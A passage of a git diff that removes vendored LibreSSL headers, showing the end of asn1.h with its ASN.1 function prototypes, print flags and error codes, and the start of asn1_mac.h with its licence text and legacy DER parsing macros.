-int ASN1_STRING_print_ex(BIO *out, ASN1_STRING *str, unsigned long flags);
-int ASN1_bn_print(BIO *bp, const char *number, const BIGNUM *num,
-    unsigned char *buf, int off);
-int ASN1_parse(BIO *bp, const unsigned char *pp, long len, int indent);
-int ASN1_parse_dump(BIO *bp, const unsigned char *pp, long len, int indent, int dump);
-#endif
-const char *ASN1_tag2str(int tag);
-
-/* Used to load and write netscape format cert */
-
-NETSCAPE_X509 *NETSCAPE_X509_new(void);
-void NETSCAPE_X509_free(NETSCAPE_X509 *a);
-NETSCAPE_X509 *d2i_NETSCAPE_X509(NETSCAPE_X509 **a, const unsigned char **in, long len);
-int i2d_NETSCAPE_X509(NETSCAPE_X509 *a, unsigned char **out);
-extern const ASN1_ITEM NETSCAPE_X509_it;
-
-int ASN1_UNIVERSALSTRING_to_string(ASN1_UNIVERSALSTRING *s);
-
-int ASN1_TYPE_set_octetstring(ASN1_TYPE *a, unsigned char *data, int len);
-int ASN1_TYPE_get_octetstring(ASN1_TYPE *a, unsigned char *data, int max_len);
-int ASN1_TYPE_set_int_octetstring(ASN1_TYPE *a, long num, unsigned char *data,
-    int len);
-int ASN1_TYPE_get_int_octetstring(ASN1_TYPE *a, long *num, unsigned char *data,
-    int max_len);
-
-STACK_OF(OPENSSL_BLOCK) *ASN1_seq_unpack(const unsigned char *buf, int len,
-    d2i_of_void *d2i, void (*free_func)(OPENSSL_BLOCK));
-unsigned char *ASN1_seq_pack(STACK_OF(OPENSSL_BLOCK) *safes, i2d_of_void *i2d,
-    unsigned char **buf, int *len );
-void *ASN1_unpack_string(ASN1_STRING *oct, d2i_of_void *d2i);
-void *ASN1_item_unpack(ASN1_STRING *oct, const ASN1_ITEM *it);
-ASN1_STRING *ASN1_pack_string(void *obj, i2d_of_void *i2d,
-    ASN1_OCTET_STRING **oct);
-
-ASN1_STRING *ASN1_item_pack(void *obj, const ASN1_ITEM *it,
-    ASN1_OCTET_STRING **oct);
-
-void ASN1_STRING_set_default_mask(unsigned long mask);
-int ASN1_STRING_set_default_mask_asc(const char *p);
-unsigned long ASN1_STRING_get_default_mask(void);
-int ASN1_mbstring_copy(ASN1_STRING **out, const unsigned char *in, int len,
-    int inform, unsigned long mask);
-int ASN1_mbstring_ncopy(ASN1_STRING **out, const unsigned char *in, int len,
-    int inform, unsigned long mask, long minsize, long maxsize);
-
-ASN1_STRING *ASN1_STRING_set_by_NID(ASN1_STRING **out,
-    const unsigned char *in, int inlen, int inform, int nid);
-ASN1_STRING_TABLE *ASN1_STRING_TABLE_get(int nid);
-int ASN1_STRING_TABLE_add(int, long, long, unsigned long, unsigned long);
-void ASN1_STRING_TABLE_cleanup(void);
-
-/* ASN1 template functions */
-
-/* Old API compatible functions */
-ASN1_VALUE *ASN1_item_new(const ASN1_ITEM *it);
-void ASN1_item_free(ASN1_VALUE *val, const ASN1_ITEM *it);
-ASN1_VALUE * ASN1_item_d2i(ASN1_VALUE **val, const unsigned char **in,
-    long len, const ASN1_ITEM *it);
-int ASN1_item_i2d(ASN1_VALUE *val, unsigned char **out, const ASN1_ITEM *it);
-int ASN1_item_ndef_i2d(ASN1_VALUE *val, unsigned char **out, const ASN1_ITEM *it);
-
-void ASN1_add_oid_module(void);
-
-ASN1_TYPE *ASN1_generate_nconf(char *str, CONF *nconf);
-ASN1_TYPE *ASN1_generate_v3(char *str, X509V3_CTX *cnf);
-
-/* ASN1 Print flags */
-
-/* Indicate missing OPTIONAL fields */
-#define ASN1_PCTX_FLAGS_SHOW_ABSENT		0x001
-/* Mark start and end of SEQUENCE */
-#define ASN1_PCTX_FLAGS_SHOW_SEQUENCE		0x002
-/* Mark start and end of SEQUENCE/SET OF */
-#define ASN1_PCTX_FLAGS_SHOW_SSOF		0x004
-/* Show the ASN1 type of primitives */
-#define ASN1_PCTX_FLAGS_SHOW_TYPE		0x008
-/* Don't show ASN1 type of ANY */
-#define ASN1_PCTX_FLAGS_NO_ANY_TYPE		0x010
-/* Don't show ASN1 type of MSTRINGs */
-#define ASN1_PCTX_FLAGS_NO_MSTRING_TYPE		0x020
-/* Don't show field names in SEQUENCE */
-#define ASN1_PCTX_FLAGS_NO_FIELD_NAME		0x040
-/* Show structure names of each SEQUENCE field */
-#define ASN1_PCTX_FLAGS_SHOW_FIELD_STRUCT_NAME	0x080
-/* Don't show structure name even at top level */
-#define ASN1_PCTX_FLAGS_NO_STRUCT_NAME		0x100
-
-int ASN1_item_print(BIO *out, ASN1_VALUE *ifld, int indent,
-    const ASN1_ITEM *it, const ASN1_PCTX *pctx);
-ASN1_PCTX *ASN1_PCTX_new(void);
-void ASN1_PCTX_free(ASN1_PCTX *p);
-unsigned long ASN1_PCTX_get_flags(ASN1_PCTX *p);
-void ASN1_PCTX_set_flags(ASN1_PCTX *p, unsigned long flags);
-unsigned long ASN1_PCTX_get_nm_flags(ASN1_PCTX *p);
-void ASN1_PCTX_set_nm_flags(ASN1_PCTX *p, unsigned long flags);
-unsigned long ASN1_PCTX_get_cert_flags(ASN1_PCTX *p);
-void ASN1_PCTX_set_cert_flags(ASN1_PCTX *p, unsigned long flags);
-unsigned long ASN1_PCTX_get_oid_flags(ASN1_PCTX *p);
-void ASN1_PCTX_set_oid_flags(ASN1_PCTX *p, unsigned long flags);
-unsigned long ASN1_PCTX_get_str_flags(ASN1_PCTX *p);
-void ASN1_PCTX_set_str_flags(ASN1_PCTX *p, unsigned long flags);
-
-BIO_METHOD *BIO_f_asn1(void);
-
-BIO *BIO_new_NDEF(BIO *out, ASN1_VALUE *val, const ASN1_ITEM *it);
-
-int i2d_ASN1_bio_stream(BIO *out, ASN1_VALUE *val, BIO *in, int flags,
-    const ASN1_ITEM *it);
-int PEM_write_bio_ASN1_stream(BIO *out, ASN1_VALUE *val, BIO *in, int flags,
-    const char *hdr, const ASN1_ITEM *it);
-int SMIME_write_ASN1(BIO *bio, ASN1_VALUE *val, BIO *data, int flags,
-    int ctype_nid, int econt_nid, STACK_OF(X509_ALGOR) *mdalgs,
-    const ASN1_ITEM *it);
-ASN1_VALUE *SMIME_read_ASN1(BIO *bio, BIO **bcont, const ASN1_ITEM *it);
-int SMIME_crlf_copy(BIO *in, BIO *out, int flags);
-int SMIME_text(BIO *in, BIO *out);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_ASN1_strings(void);
-
-/* Error codes for the ASN1 functions. */
-
-/* Function codes. */
-#define ASN1_F_A2D_ASN1_OBJECT				 100
-#define ASN1_F_A2I_ASN1_ENUMERATED			 101
-#define ASN1_F_A2I_ASN1_INTEGER				 102
-#define ASN1_F_A2I_ASN1_STRING				 103
-#define ASN1_F_APPEND_EXP				 176
-#define ASN1_F_ASN1_BIT_STRING_SET_BIT			 183
-#define ASN1_F_ASN1_CB					 177
-#define ASN1_F_ASN1_CHECK_TLEN				 104
-#define ASN1_F_ASN1_COLLATE_PRIMITIVE			 105
-#define ASN1_F_ASN1_COLLECT				 106
-#define ASN1_F_ASN1_D2I_EX_PRIMITIVE			 108
-#define ASN1_F_ASN1_D2I_FP				 109
-#define ASN1_F_ASN1_D2I_READ_BIO			 107
-#define ASN1_F_ASN1_DIGEST				 184
-#define ASN1_F_ASN1_DO_ADB				 110
-#define ASN1_F_ASN1_DUP					 111
-#define ASN1_F_ASN1_ENUMERATED_SET			 112
-#define ASN1_F_ASN1_ENUMERATED_TO_BN			 113
-#define ASN1_F_ASN1_EX_C2I				 204
-#define ASN1_F_ASN1_FIND_END				 190
-#define ASN1_F_ASN1_GENERALIZEDTIME_ADJ			 216
-#define ASN1_F_ASN1_GENERALIZEDTIME_SET			 185
-#define ASN1_F_ASN1_GENERATE_V3				 178
-#define ASN1_F_ASN1_GET_OBJECT				 114
-#define ASN1_F_ASN1_HEADER_NEW				 115
-#define ASN1_F_ASN1_I2D_BIO				 116
-#define ASN1_F_ASN1_I2D_FP				 117
-#define ASN1_F_ASN1_INTEGER_SET				 118
-#define ASN1_F_ASN1_INTEGER_TO_BN			 119
-#define ASN1_F_ASN1_ITEM_D2I_FP				 206
-#define ASN1_F_ASN1_ITEM_DUP				 191
-#define ASN1_F_ASN1_ITEM_EX_COMBINE_NEW			 121
-#define ASN1_F_ASN1_ITEM_EX_D2I				 120
-#define ASN1_F_ASN1_ITEM_I2D_BIO			 192
-#define ASN1_F_ASN1_ITEM_I2D_FP				 193
-#define ASN1_F_ASN1_ITEM_PACK				 198
-#define ASN1_F_ASN1_ITEM_SIGN				 195
-#define ASN1_F_ASN1_ITEM_SIGN_CTX			 220
-#define ASN1_F_ASN1_ITEM_UNPACK				 199
-#define ASN1_F_ASN1_ITEM_VERIFY				 197
-#define ASN1_F_ASN1_MBSTRING_NCOPY			 122
-#define ASN1_F_ASN1_OBJECT_NEW				 123
-#define ASN1_F_ASN1_OUTPUT_DATA				 214
-#define ASN1_F_ASN1_PACK_STRING				 124
-#define ASN1_F_ASN1_PCTX_NEW				 205
-#define ASN1_F_ASN1_PKCS5_PBE_SET			 125
-#define ASN1_F_ASN1_SEQ_PACK				 126
-#define ASN1_F_ASN1_SEQ_UNPACK				 127
-#define ASN1_F_ASN1_SIGN				 128
-#define ASN1_F_ASN1_STR2TYPE				 179
-#define ASN1_F_ASN1_STRING_SET				 186
-#define ASN1_F_ASN1_STRING_TABLE_ADD			 129
-#define ASN1_F_ASN1_STRING_TYPE_NEW			 130
-#define ASN1_F_ASN1_TEMPLATE_EX_D2I			 132
-#define ASN1_F_ASN1_TEMPLATE_NEW			 133
-#define ASN1_F_ASN1_TEMPLATE_NOEXP_D2I			 131
-#define ASN1_F_ASN1_TIME_ADJ				 217
-#define ASN1_F_ASN1_TIME_SET				 175
-#define ASN1_F_ASN1_TYPE_GET_INT_OCTETSTRING		 134
-#define ASN1_F_ASN1_TYPE_GET_OCTETSTRING		 135
-#define ASN1_F_ASN1_UNPACK_STRING			 136
-#define ASN1_F_ASN1_UTCTIME_ADJ				 218
-#define ASN1_F_ASN1_UTCTIME_SET				 187
-#define ASN1_F_ASN1_VERIFY				 137
-#define ASN1_F_B64_READ_ASN1				 209
-#define ASN1_F_B64_WRITE_ASN1				 210
-#define ASN1_F_BIO_NEW_NDEF				 208
-#define ASN1_F_BITSTR_CB				 180
-#define ASN1_F_BN_TO_ASN1_ENUMERATED			 138
-#define ASN1_F_BN_TO_ASN1_INTEGER			 139
-#define ASN1_F_C2I_ASN1_BIT_STRING			 189
-#define ASN1_F_C2I_ASN1_INTEGER				 194
-#define ASN1_F_C2I_ASN1_OBJECT				 196
-#define ASN1_F_COLLECT_DATA				 140
-#define ASN1_F_D2I_ASN1_BIT_STRING			 141
-#define ASN1_F_D2I_ASN1_BOOLEAN				 142
-#define ASN1_F_D2I_ASN1_BYTES				 143
-#define ASN1_F_D2I_ASN1_GENERALIZEDTIME			 144
-#define ASN1_F_D2I_ASN1_HEADER				 145
-#define ASN1_F_D2I_ASN1_INTEGER				 146
-#define ASN1_F_D2I_ASN1_OBJECT				 147
-#define ASN1_F_D2I_ASN1_SET				 148
-#define ASN1_F_D2I_ASN1_TYPE_BYTES			 149
-#define ASN1_F_D2I_ASN1_UINTEGER			 150
-#define ASN1_F_D2I_ASN1_UTCTIME				 151
-#define ASN1_F_D2I_AUTOPRIVATEKEY			 207
-#define ASN1_F_D2I_NETSCAPE_RSA				 152
-#define ASN1_F_D2I_NETSCAPE_RSA_2			 153
-#define ASN1_F_D2I_PRIVATEKEY				 154
-#define ASN1_F_D2I_PUBLICKEY				 155
-#define ASN1_F_D2I_RSA_NET				 200
-#define ASN1_F_D2I_RSA_NET_2				 201
-#define ASN1_F_D2I_X509					 156
-#define ASN1_F_D2I_X509_CINF				 157
-#define ASN1_F_D2I_X509_PKEY				 159
-#define ASN1_F_I2D_ASN1_BIO_STREAM			 211
-#define ASN1_F_I2D_ASN1_SET				 188
-#define ASN1_F_I2D_ASN1_TIME				 160
-#define ASN1_F_I2D_DSA_PUBKEY				 161
-#define ASN1_F_I2D_EC_PUBKEY				 181
-#define ASN1_F_I2D_PRIVATEKEY				 163
-#define ASN1_F_I2D_PUBLICKEY				 164
-#define ASN1_F_I2D_RSA_NET				 162
-#define ASN1_F_I2D_RSA_PUBKEY				 165
-#define ASN1_F_LONG_C2I					 166
-#define ASN1_F_OID_MODULE_INIT				 174
-#define ASN1_F_PARSE_TAGGING				 182
-#define ASN1_F_PKCS5_PBE2_SET_IV			 167
-#define ASN1_F_PKCS5_PBE_SET				 202
-#define ASN1_F_PKCS5_PBE_SET0_ALGOR			 215
-#define ASN1_F_PKCS5_PBKDF2_SET				 219
-#define ASN1_F_SMIME_READ_ASN1				 212
-#define ASN1_F_SMIME_TEXT				 213
-#define ASN1_F_X509_CINF_NEW				 168
-#define ASN1_F_X509_CRL_ADD0_REVOKED			 169
-#define ASN1_F_X509_INFO_NEW				 170
-#define ASN1_F_X509_NAME_ENCODE				 203
-#define ASN1_F_X509_NAME_EX_D2I				 158
-#define ASN1_F_X509_NAME_EX_NEW				 171
-#define ASN1_F_X509_NEW					 172
-#define ASN1_F_X509_PKEY_NEW				 173
-
-/* Reason codes. */
-#define ASN1_R_ADDING_OBJECT				 171
-#define ASN1_R_ASN1_PARSE_ERROR				 203
-#define ASN1_R_ASN1_SIG_PARSE_ERROR			 204
-#define ASN1_R_AUX_ERROR				 100
-#define ASN1_R_BAD_CLASS				 101
-#define ASN1_R_BAD_OBJECT_HEADER			 102
-#define ASN1_R_BAD_PASSWORD_READ			 103
-#define ASN1_R_BAD_TAG					 104
-#define ASN1_R_BMPSTRING_IS_WRONG_LENGTH		 214
-#define ASN1_R_BN_LIB					 105
-#define ASN1_R_BOOLEAN_IS_WRONG_LENGTH			 106
-#define ASN1_R_BUFFER_TOO_SMALL				 107
-#define ASN1_R_CIPHER_HAS_NO_OBJECT_IDENTIFIER		 108
-#define ASN1_R_CONTEXT_NOT_INITIALISED			 217
-#define ASN1_R_DATA_IS_WRONG				 109
-#define ASN1_R_DECODE_ERROR				 110
-#define ASN1_R_DECODING_ERROR				 111
-#define ASN1_R_DEPTH_EXCEEDED				 174
-#define ASN1_R_DIGEST_AND_KEY_TYPE_NOT_SUPPORTED	 198
-#define ASN1_R_ENCODE_ERROR				 112
-#define ASN1_R_ERROR_GETTING_TIME			 173
-#define ASN1_R_ERROR_LOADING_SECTION			 172
-#define ASN1_R_ERROR_PARSING_SET_ELEMENT		 113
-#define ASN1_R_ERROR_SETTING_CIPHER_PARAMS		 114
-#define ASN1_R_EXPECTING_AN_INTEGER			 115
-#define ASN1_R_EXPECTING_AN_OBJECT			 116
-#define ASN1_R_EXPECTING_A_BOOLEAN			 117
-#define ASN1_R_EXPECTING_A_TIME				 118
-#define ASN1_R_EXPLICIT_LENGTH_MISMATCH			 119
-#define ASN1_R_EXPLICIT_TAG_NOT_CONSTRUCTED		 120
-#define ASN1_R_FIELD_MISSING				 121
-#define ASN1_R_FIRST_NUM_TOO_LARGE			 122
-#define ASN1_R_HEADER_TOO_LONG				 123
-#define ASN1_R_ILLEGAL_BITSTRING_FORMAT			 175
-#define ASN1_R_ILLEGAL_BOOLEAN				 176
-#define ASN1_R_ILLEGAL_CHARACTERS			 124
-#define ASN1_R_ILLEGAL_FORMAT				 177
-#define ASN1_R_ILLEGAL_HEX				 178
-#define ASN1_R_ILLEGAL_IMPLICIT_TAG			 179
-#define ASN1_R_ILLEGAL_INTEGER				 180
-#define ASN1_R_ILLEGAL_NESTED_TAGGING			 181
-#define ASN1_R_ILLEGAL_NULL				 125
-#define ASN1_R_ILLEGAL_NULL_VALUE			 182
-#define ASN1_R_ILLEGAL_OBJECT				 183
-#define ASN1_R_ILLEGAL_OPTIONAL_ANY			 126
-#define ASN1_R_ILLEGAL_OPTIONS_ON_ITEM_TEMPLATE		 170
-#define ASN1_R_ILLEGAL_TAGGED_ANY			 127
-#define ASN1_R_ILLEGAL_TIME_VALUE			 184
-#define ASN1_R_INTEGER_NOT_ASCII_FORMAT			 185
-#define ASN1_R_INTEGER_TOO_LARGE_FOR_LONG		 128
-#define ASN1_R_INVALID_BIT_STRING_BITS_LEFT		 220
-#define ASN1_R_INVALID_BMPSTRING_LENGTH			 129
-#define ASN1_R_INVALID_DIGIT				 130
-#define ASN1_R_INVALID_MIME_TYPE			 205
-#define ASN1_R_INVALID_MODIFIER				 186
-#define ASN1_R_INVALID_NUMBER				 187
-#define ASN1_R_INVALID_OBJECT_ENCODING			 216
-#define ASN1_R_INVALID_SEPARATOR			 131
-#define ASN1_R_INVALID_TIME_FORMAT			 132
-#define ASN1_R_INVALID_UNIVERSALSTRING_LENGTH		 133
-#define ASN1_R_INVALID_UTF8STRING			 134
-#define ASN1_R_IV_TOO_LARGE				 135
-#define ASN1_R_LENGTH_ERROR				 136
-#define ASN1_R_LIST_ERROR				 188
-#define ASN1_R_MIME_NO_CONTENT_TYPE			 206
-#define ASN1_R_MIME_PARSE_ERROR				 207
-#define ASN1_R_MIME_SIG_PARSE_ERROR			 208
-#define ASN1_R_MISSING_EOC				 137
-#define ASN1_R_MISSING_SECOND_NUMBER			 138
-#define ASN1_R_MISSING_VALUE				 189
-#define ASN1_R_MSTRING_NOT_UNIVERSAL			 139
-#define ASN1_R_MSTRING_WRONG_TAG			 140
-#define ASN1_R_NESTED_ASN1_STRING			 197
-#define ASN1_R_NON_HEX_CHARACTERS			 141
-#define ASN1_R_NOT_ASCII_FORMAT				 190
-#define ASN1_R_NOT_ENOUGH_DATA				 142
-#define ASN1_R_NO_CONTENT_TYPE				 209
-#define ASN1_R_NO_DEFAULT_DIGEST			 201
-#define ASN1_R_NO_MATCHING_CHOICE_TYPE			 143
-#define ASN1_R_NO_MULTIPART_BODY_FAILURE		 210
-#define ASN1_R_NO_MULTIPART_BOUNDARY			 211
-#define ASN1_R_NO_SIG_CONTENT_TYPE			 212
-#define ASN1_R_NULL_IS_WRONG_LENGTH			 144
-#define ASN1_R_OBJECT_NOT_ASCII_FORMAT			 191
-#define ASN1_R_ODD_NUMBER_OF_CHARS			 145
-#define ASN1_R_PRIVATE_KEY_HEADER_MISSING		 146
-#define ASN1_R_SECOND_NUMBER_TOO_LARGE			 147
-#define ASN1_R_SEQUENCE_LENGTH_MISMATCH			 148
-#define ASN1_R_SEQUENCE_NOT_CONSTRUCTED			 149
-#define ASN1_R_SEQUENCE_OR_SET_NEEDS_CONFIG		 192
-#define ASN1_R_SHORT_LINE				 150
-#define ASN1_R_SIG_INVALID_MIME_TYPE			 213
-#define ASN1_R_STREAMING_NOT_SUPPORTED			 202
-#define ASN1_R_STRING_TOO_LONG				 151
-#define ASN1_R_STRING_TOO_SHORT				 152
-#define ASN1_R_TAG_VALUE_TOO_HIGH			 153
-#define ASN1_R_THE_ASN1_OBJECT_IDENTIFIER_IS_NOT_KNOWN_FOR_THIS_MD 154
-#define ASN1_R_TIME_NOT_ASCII_FORMAT			 193
-#define ASN1_R_TOO_LONG					 155
-#define ASN1_R_TYPE_NOT_CONSTRUCTED			 156
-#define ASN1_R_UNABLE_TO_DECODE_RSA_KEY			 157
-#define ASN1_R_UNABLE_TO_DECODE_RSA_PRIVATE_KEY		 158
-#define ASN1_R_UNEXPECTED_EOC				 159
-#define ASN1_R_UNIVERSALSTRING_IS_WRONG_LENGTH		 215
-#define ASN1_R_UNKNOWN_FORMAT				 160
-#define ASN1_R_UNKNOWN_MESSAGE_DIGEST_ALGORITHM		 161
-#define ASN1_R_UNKNOWN_OBJECT_TYPE			 162
-#define ASN1_R_UNKNOWN_PUBLIC_KEY_TYPE			 163
-#define ASN1_R_UNKNOWN_SIGNATURE_ALGORITHM		 199
-#define ASN1_R_UNKNOWN_TAG				 194
-#define ASN1_R_UNKOWN_FORMAT				 195
-#define ASN1_R_UNSUPPORTED_ANY_DEFINED_BY_TYPE		 164
-#define ASN1_R_UNSUPPORTED_CIPHER			 165
-#define ASN1_R_UNSUPPORTED_ENCRYPTION_ALGORITHM		 166
-#define ASN1_R_UNSUPPORTED_PUBLIC_KEY_TYPE		 167
-#define ASN1_R_UNSUPPORTED_TYPE				 196
-#define ASN1_R_WRONG_PUBLIC_KEY_TYPE			 200
-#define ASN1_R_WRONG_TAG				 168
-#define ASN1_R_WRONG_TYPE				 169
-
-
-int ASN1_time_parse(const char *_bytes, size_t _len, struct tm *_tm, int _mode);
-int ASN1_time_tm_cmp(struct tm *_tm1, struct tm *_tm2);
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/asn1_mac.h b/thirdparty/libressl/include/openssl/asn1_mac.h
deleted file mode 100644
index fd524dc..0000000
--- a/thirdparty/libressl/include/openssl/asn1_mac.h
+++ /dev/null
@@ -1,426 +0,0 @@
-/* $OpenBSD: asn1_mac.h,v 1.14 2014/06/27 04:41:09 miod Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_ASN1_MAC_H
-#define HEADER_ASN1_MAC_H
-
-#include <openssl/asn1.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#ifndef ASN1_MAC_ERR_LIB
-#define ASN1_MAC_ERR_LIB	ERR_LIB_ASN1
-#endif
-
-#define ASN1_MAC_H_err(f,r,line) \
-	ERR_PUT_error(ASN1_MAC_ERR_LIB,(f),(r),__FILE__,(line))
-
-#define M_ASN1_D2I_vars(a,type,func) \
-	ASN1_const_CTX c; \
-	type ret=NULL; \
-	\
-	c.pp=(const unsigned char **)pp; \
-	c.q= *(const unsigned char **)pp; \
-	c.error=ERR_R_NESTED_ASN1_ERROR; \
-	if ((a == NULL) || ((*a) == NULL)) \
-		{ if ((ret=(type)func()) == NULL) \
-			{ c.line=__LINE__; goto err; } } \
-	else	ret=(*a);
-
-#define M_ASN1_D2I_Init() \
-	c.p= *(const unsigned char **)pp; \
-	c.max=(length == 0)?0:(c.p+length);
-
-#define M_ASN1_D2I_Finish_2(a) \
-	if (!asn1_const_Finish(&c)) \
-		{ c.line=__LINE__; goto err; } \
-	*(const unsigned char **)pp=c.p; \
-	if (a != NULL) (*a)=ret; \
-	return(ret);
-
-#define M_ASN1_D2I_Finish(a,func,e) \
-	M_ASN1_D2I_Finish_2(a); \
-err:\
-	ASN1_MAC_H_err((e),c.error,c.line); \
-	asn1_add_error(*(const unsigned char **)pp,(int)(c.q- *pp)); \
-	if ((ret != NULL) && ((a == NULL) || (*a != ret))) func(ret); \
-	return(NULL)
-
-#define M_ASN1_D2I_start_sequence() \
-	if (!asn1_GetSequence(&c,&length)) \
-		{ c.line=__LINE__; goto err; }
-/* Begin reading ASN1 without a surrounding sequence */
-#define M_ASN1_D2I_begin() \
-	c.slen = length;
-
-/* End reading ASN1 with no check on length */
-#define M_ASN1_D2I_Finish_nolen(a, func, e) \
-	*pp=c.p; \
-	if (a != NULL) (*a)=ret; \
-	return(ret); \
-err:\
-	ASN1_MAC_H_err((e),c.error,c.line); \
-	asn1_add_error(*pp,(int)(c.q- *pp)); \
-	if ((ret != NULL) && ((a == NULL) || (*a != ret))) func(ret); \
-	return(NULL)
-
-#define M_ASN1_D2I_end_sequence() \
-	(((c.inf&1) == 0)?(c.slen <= 0): \
-		(c.eos=ASN1_const_check_infinite_end(&c.p,c.slen)))
-
-/* Don't use this with d2i_ASN1_BOOLEAN() */
-#define M_ASN1_D2I_get(b, func) \
-	c.q=c.p; \
-	if (func(&(b),&c.p,c.slen) == NULL) \
-		{c.line=__LINE__; goto err; } \
-	c.slen-=(c.p-c.q);
-
-/* Don't use this with d2i_ASN1_BOOLEAN() */
-#define M_ASN1_D2I_get_x(type,b,func) \
-	c.q=c.p; \
-	if (((D2I_OF(type))func)(&(b),&c.p,c.slen) == NULL) \
-		{c.line=__LINE__; goto err; } \
-	c.slen-=(c.p-c.q);
-
-/* use this instead () */
-#define M_ASN1_D2I_get_int(b,func) \
-	c.q=c.p; \
-	if (func(&(b),&c.p,c.slen) < 0) \
-		{c.line=__LINE__; goto err; } \
-	c.slen-=(c.p-c.q);
-
-#define M_ASN1_D2I_get_opt(b,func,type) \
-	if ((c.slen != 0) && ((M_ASN1_next & (~V_ASN1_CONSTRUCTED)) \
-		== (V_ASN1_UNIVERSAL|(type)))) \
-		{ \
-		M_ASN1_D2I_get(b,func); \
-		}
-
-#define M_ASN1_D2I_get_int_opt(b,func,type) \
-	if ((c.slen != 0) && ((M_ASN1_next & (~V_ASN1_CONSTRUCTED)) \
-		== (V_ASN1_UNIVERSAL|(type)))) \
-		{ \
-		M_ASN1_D2I_get_int(b,func); \
-		}
-
-#define M_ASN1_D2I_get_imp(b,func, type) \
-	M_ASN1_next=(_tmp& V_ASN1_CONSTRUCTED)|type; \
-	c.q=c.p; \
-	if (func(&(b),&c.p,c.slen) == NULL) \
-		{c.line=__LINE__; M_ASN1_next_prev = _tmp; goto err; } \
-	c.slen-=(c.p-c.q);\
-	M_ASN1_next_prev=_tmp;
-
-#define M_ASN1_D2I_get_IMP_opt(b,func,tag,type) \
-	if ((c.slen != 0) && ((M_ASN1_next & (~V_ASN1_CONSTRUCTED)) == \
-		(V_ASN1_CONTEXT_SPECIFIC|(tag)))) \
-		{ \
-		unsigned char _tmp = M_ASN1_next; \
-		M_ASN1_D2I_get_imp(b,func, type);\
-		}
-
-#define M_ASN1_D2I_get_set_type(type,r,func,free_func) \
-		M_ASN1_D2I_get_imp_set_type(type,r,func,free_func, \
-			V_ASN1_SET,V_ASN1_UNIVERSAL);
-
-#define M_ASN1_D2I_get_set_opt_type(type,r,func,free_func) \
-	if ((c.slen != 0) && (M_ASN1_next == (V_ASN1_UNIVERSAL| \
-		V_ASN1_CONSTRUCTED|V_ASN1_SET)))\
-		{ M_ASN1_D2I_get_set_type(type,r,func,free_func); }
-
-#define M_ASN1_I2D_len_SET_opt(a,f) \
-	if ((a != NULL) && (sk_num(a) != 0)) \
-		M_ASN1_I2D_len_SET(a,f);
-
-#define M_ASN1_I2D_put_SET_opt(a,f) \
-	if ((a != NULL) && (sk_num(a) != 0)) \
-		M_ASN1_I2D_put_SET(a,f);
-
-#define M_ASN1_I2D_put_SEQUENCE_opt(a,f) \
-	if ((a != NULL) && (sk_num(a) != 0)) \
-		M_ASN1_I2D_put_SEQUENCE(a,f);
-
-#define M_ASN1_I2D_put_SEQUENCE_opt_type(type,a,f) \
-	if ((a != NULL) && (sk_##type##_num(a) != 0)) \
-		M_ASN1_I2D_put_SEQUENCE_type(type,a,f);
-
-#define M_ASN1_D2I_get_IMP_set_opt_type(type,b,func,free_func,tag) \
-	if ((c.slen != 0) && \
-		(M_ASN1_next == \
-		(V_ASN1_CONTEXT_SPECIFIC|V_ASN1_CONSTRUCTED|(tag))))\
-		{ \
-		M_ASN1_D2I_get_imp_set_type(type,b,func,free_func,\
-			tag,V_ASN1_CONTEXT_SPECIFIC); \
-		}
-
-#define M_ASN1_D2I_get_seq_type(type,r,func,free_func) \
-		M_ASN1_D2I_get_imp_set_type(type,r,func,free_func,\
-					    V_ASN1_SEQUENCE,V_ASN1_UNIVERSAL)
-
